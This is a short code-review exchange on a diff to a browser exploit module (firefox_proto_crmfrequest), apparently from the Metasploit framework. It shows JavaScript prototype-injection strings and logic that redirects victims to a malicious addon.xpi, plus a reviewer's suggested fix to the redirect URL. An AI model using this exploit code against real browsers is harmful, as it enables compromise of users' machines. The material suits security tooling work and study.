modules/exploits/multi/browser/firefox_proto_crmfrequest.rb

```diff
@@ -68,17 +66,25 @@ def on_request_exploit(cli, request, target_info)
       send_response(cli, generate_addon_xpi(cli).pack, { 'Content-Type' => 'application/x-xpinstall' })
     else
       print_status("Sending HTML")
-      send_response_html(cli, generate_html(target_info))
+      res = generate_html(target_info,request.headers['Host'])
+      vprint_status res.to_s
+      send_response_html(cli, res)
     end
   end
 
-  def generate_html(target_info)
+  def generate_html(target_info,refer)
     injection = if target_info[:ua_ver].to_i == 15
       "Function.prototype.call.call(p.__defineGetter__,obj,key,runme);"
     else
       "p2.constructor.defineProperty(obj,key,{get:runme});"
     end
 
+    if refer.nil? or refer.blank?
+      redirect = "#{get_module_uri}/addon.xpi"
+    else
+      redirect = "http://#{refer}/#{@exploit_receiver_page}/addon.xpi"
```

Comment:
So I looked at the problem this morning, and I found out this line is the problem. Could you please change this line to:

```ruby
redirect = "http://#{refer}#{get_module_resource}addon.xpi"
```

And then let me know if it's still working properly? Thanks.